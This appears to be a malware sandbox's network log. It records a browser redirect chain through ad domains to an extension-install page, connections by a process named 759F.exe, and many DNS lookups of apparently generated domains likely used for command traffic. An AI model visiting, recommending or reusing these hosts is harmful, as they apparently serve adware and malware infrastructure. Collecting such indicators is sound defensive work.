                                                                                          http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6
                                                                                          http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.4kB
                                                                                          4.3kB
                                                                                          11
                                                                                          9

                                                                                          HTTP Request

                                                                                          GET http://www.directdexchange.com/jump/next.php?r=2087215

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET http://www.directdexchange.com/jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.4444983392895643&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref=

                                                                                          HTTP Response

                                                                                          302

                                                                                          HTTP Request

                                                                                          GET http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 35.201.70.46:80
                                                                                          www.directdexchange.com
                                                                                          MicrosoftEdgeCP.exe
                                                                                          190 B
                                                                                          92 B
                                                                                          4
                                                                                          2
                                                                                        • 54.91.59.199:443
                                                                                          https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.5kB
                                                                                          5.5kB
                                                                                          15
                                                                                          11

                                                                                          HTTP Request

                                                                                          GET https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 54.91.59.199:443
                                                                                          dist.acnav.online
                                                                                          tls
                                                                                          MicrosoftEdgeCP.exe
                                                                                          849 B
                                                                                          4.9kB
                                                                                          12
                                                                                          8
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/images/install-step1-chrome.png
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          4.5kB
                                                                                          63.6kB
                                                                                          60
                                                                                          54

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/js/global.min.js

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/images/install-step1-chrome.png

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/layouts/box/box.css
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.3kB
                                                                                          10.1kB
                                                                                          25
                                                                                          20

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/config.min.js

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/layouts/box/box.css

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/links.json
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.9kB
                                                                                          27.7kB
                                                                                          32
                                                                                          27

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/images/install-step2.png

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/links.json

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/lang/box/ePedia
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.9kB
                                                                                          25.8kB
                                                                                          31
                                                                                          26

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/images/install-step3.png

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/lang/box/ePedia

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/logo.png
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.1kB
                                                                                          15.4kB
                                                                                          23
                                                                                          19

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/logo.png

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/background.png
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          3.9kB
                                                                                          73.5kB
                                                                                          62
                                                                                          58

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/background.png

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 142.250.179.202:443
                                                                                          ajax.googleapis.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.6kB
                                                                                          39.2kB
                                                                                          41
                                                                                          35
                                                                                        • 142.250.179.202:443
                                                                                          ajax.googleapis.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.0kB
                                                                                          3.8kB
                                                                                          13
                                                                                          10
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/favicon.ico
                                                                                          tls, http
                                                                                          MicrosoftEdge.exe
                                                                                          1.3kB
                                                                                          5.3kB
                                                                                          15
                                                                                          10

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/favicon.ico

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/favicon.ico
                                                                                          tls, http
                                                                                          MicrosoftEdge.exe
                                                                                          3.1kB
                                                                                          60.4kB
                                                                                          54
                                                                                          50

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/favicon.ico

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 104.16.18.94:443
                                                                                          cdnjs.cloudflare.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.6kB
                                                                                          8.7kB
                                                                                          18
                                                                                          16
                                                                                        • 104.16.18.94:443
                                                                                          cdnjs.cloudflare.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          979 B
                                                                                          3.5kB
                                                                                          12
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.0kB
                                                                                          6.3kB
                                                                                          10
                                                                                          11
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 172.217.17.51:443
                                                                                          accounts.snapchat.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          6.2kB
                                                                                          14.7kB
                                                                                          26
                                                                                          30
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 82.118.23.111:80
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          http
                                                                                          756 B
                                                                                          443 B
                                                                                          7
                                                                                          6

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 31.13.83.52:443
                                                                                          i.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          4.8kB
                                                                                          9.1kB
                                                                                          15
                                                                                          18
                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002002131-service1002.space
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002002131-service1002.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002002231-service1002.space
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002002231-service1002.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder3100231-service1002.space
                                                                                          dns
                                                                                          89 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder3100231-service1002.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002002431-service1002.space
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002002431-service1002.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002002531-service1002.space
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002002531-service1002.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder33417-012425999080321.space
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder33417-012425999080321.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321test125831-service10020125999080321.space
                                                                                          dns
                                                                                          96 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test125831-service10020125999080321.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321test136831-service10020125999080321.space
                                                                                          dns
                                                                                          96 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test136831-service10020125999080321.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321test147831-service10020125999080321.space
                                                                                          dns
                                                                                          96 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test147831-service10020125999080321.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321test146831-service10020125999080321.space
                                                                                          dns
                                                                                          96 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test146831-service10020125999080321.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321test134831-service10020125999080321.space
                                                                                          dns
                                                                                          96 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test134831-service10020125999080321.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321est213531-service1002012425999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321est213531-service1002012425999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321yes1t3481-service10020125999080321.ru
                                                                                          dns
                                                                                          92 B
                                                                                          153 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321yes1t3481-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          dns
                                                                                          460 B
                                                                                          5

                                                                                          DNS Request

                                                                                          999080321test13561-service10020125999080321.su

                                                                                          DNS Request

                                                                                          999080321test13561-service10020125999080321.su

                                                                                          DNS Request

                                                                                          999080321test13561-service10020125999080321.su

                                                                                          DNS Request

                                                                                          999080321test13561-service10020125999080321.su

                                                                                          DNS Request

                                                                                          999080321test13561-service10020125999080321.su

                                                                                        • 8.8.8.8:53
                                                                                          999080321test14781-service10020125999080321.info
                                                                                          dns
                                                                                          94 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test14781-service10020125999080321.info

                                                                                        • 8.8.8.8:53
                                                                                          999080321test13461-service10020125999080321.net
                                                                                          dns
                                                                                          93 B
                                                                                          166 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test13461-service10020125999080321.net

                                                                                        • 8.8.8.8:53
                                                                                          999080321test15671-service10020125999080321.tech
                                                                                          dns
                                                                                          94 B
                                                                                          159 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test15671-service10020125999080321.tech

                                                                                        • 8.8.8.8:53
                                                                                          999080321test12671-service10020125999080321.online
                                                                                          dns
                                                                                          96 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test12671-service10020125999080321.online

                                                                                        • 8.8.8.8:53
                                                                                          999080321utest1341-service10020125999080321.ru
                                                                                          dns
                                                                                          92 B
                                                                                          153 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321utest1341-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321uest71-service100201dom25999080321.ru
                                                                                          dns
                                                                                          92 B
                                                                                          153 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321uest71-service100201dom25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321test61-service10020125999080321.website
                                                                                          dns
                                                                                          94 B
                                                                                          159 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test61-service10020125999080321.website

                                                                                        • 8.8.8.8:53
                                                                                          999080321test51-service10020125999080321.xyz
                                                                                          dns
                                                                                          90 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test51-service10020125999080321.xyz

                                                                                        • 8.8.8.8:53
                                                                                          999080321test41-service100201pro25999080321.ru
                                                                                          dns
                                                                                          92 B
                                                                                          153 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test41-service100201pro25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321yest31-service100201rus25999080321.ru
                                                                                          dns
                                                                                          92 B
                                                                                          153 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321yest31-service100201rus25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321rest21-service10020125999080321.eu
                                                                                          dns
                                                                                          89 B
                                                                                          143 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321rest21-service10020125999080321.eu

                                                                                        • 8.8.8.8:53
                                                                                          999080321test11-service10020125999080321.press
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test11-service10020125999080321.press

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder4561-service10020125999080321.ru
                                                                                          dns
                                                                                          96 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder4561-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321rustest213-service10020125999080321.ru
                                                                                          dns
                                                                                          93 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321rustest213-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321test281-service10020125999080321.ru
                                                                                          dns
                                                                                          90 B
                                                                                          151 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test281-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321test261-service10020125999080321.space
                                                                                          dns
                                                                                          93 B
                                                                                          158 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test261-service10020125999080321.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321yomtest251-service10020125999080321.ru
                                                                                          dns
                                                                                          93 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321yomtest251-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321yirtest231-service10020125999080321.ru
                                                                                          dns
                                                                                          93 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321yirtest231-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321test391-service10020125999080321.ru
                                                                                          dns
                                                                                          90 B
                                                                                          151 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test391-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321test481-service10020125999080321.ru
                                                                                          dns
                                                                                          90 B
                                                                                          151 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test481-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321test571-service10020125999080321.pro
                                                                                          dns
                                                                                          91 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test571-service10020125999080321.pro

                                                                                        • 8.8.8.8:53
                                                                                          999080321test461-service10020125999080321.host
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test461-service10020125999080321.host

                                                                                        • 8.8.8.8:53
                                                                                          999080321test231-service10020125999080321.fun
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321test231-service10020125999080321.fun

                                                                                        • 8.8.8.8:53
                                                                                          999080321tostest371-service10020125999080321.ru
                                                                                          dns
                                                                                          93 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321tostest371-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321oopoest361-service10020125999080321.ru
                                                                                          dns
                                                                                          93 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321oopoest361-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder481-service10020125999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder481-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder471-service10020125999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder471-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder351-service10020125999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder351-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder241-service10020125999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder241-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-service100201shop25999080321.ru
                                                                                          dns
                                                                                          100 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-service100201shop25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-service100201life25999080321.ru
                                                                                          dns
                                                                                          100 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-service100201life25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-service100201blog25999080321.ru
                                                                                          dns
                                                                                          100 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-service100201blog25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          dns
                                                                                          188 B
                                                                                          310 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321megatest251-service10020125999080321.ru

                                                                                          DNS Request

                                                                                          999080321megatest251-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321infotest341-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321infotest341-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321besttest971-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321besttest971-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321shoptest871-service10020125999080321.ru
                                                                                          dns
                                                                                          160 B
                                                                                          306 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321shoptest871-service10020125999080321.ru

                                                                                          DNS Request

                                                                                          ka-f.fontawesome.com

                                                                                          DNS Response

                                                                                          172.64.133.9
                                                                                          172.64.132.9

                                                                                        • 8.8.8.8:53
                                                                                          999080321kupitest451-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321kupitest451-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321proftest981-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321proftest981-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321clubtest561-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321clubtest561-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321mytest151-service1002012425999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321mytest151-service1002012425999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfoldert161-service1002012425999080321.ru
                                                                                          dns
                                                                                          98 B
                                                                                          159 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfoldert161-service1002012425999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100251-service25999080321.ru
                                                                                          dns
                                                                                          92 B
                                                                                          153 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder100251-service25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100241-service10020999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder100241-service10020999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100231-service1022020.ru
                                                                                          dns
                                                                                          88 B
                                                                                          149 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder100231-service1022020.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          dns
                                                                                          176 B
                                                                                          298 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321newfolder100221-service1022020.ru

                                                                                          DNS Request

                                                                                          999080321newfolder100221-service1022020.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012525999080321.ml
                                                                                          dns
                                                                                          87 B
                                                                                          145 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012525999080321.ml

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012625999080321.ga
                                                                                          dns
                                                                                          174 B
                                                                                          290 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012625999080321.ga

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012625999080321.ga

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012725999080321.cf
                                                                                          dns
                                                                                          87 B
                                                                                          146 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012725999080321.cf

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012825999080321.gq
                                                                                          dns
                                                                                          87 B
                                                                                          160 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012825999080321.gq

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012925999080321.com
                                                                                          dns
                                                                                          88 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012925999080321.com

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01302599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01302599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01312599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01312599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01322599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01322599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01332599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01332599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01342599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01342599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01352599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01352599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01362599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01362599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01372599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01372599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01382599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01382599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01392599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01392599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01402599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01402599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01412599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01412599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01422599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01422599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01432599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01432599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01442599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01442599908032135.site

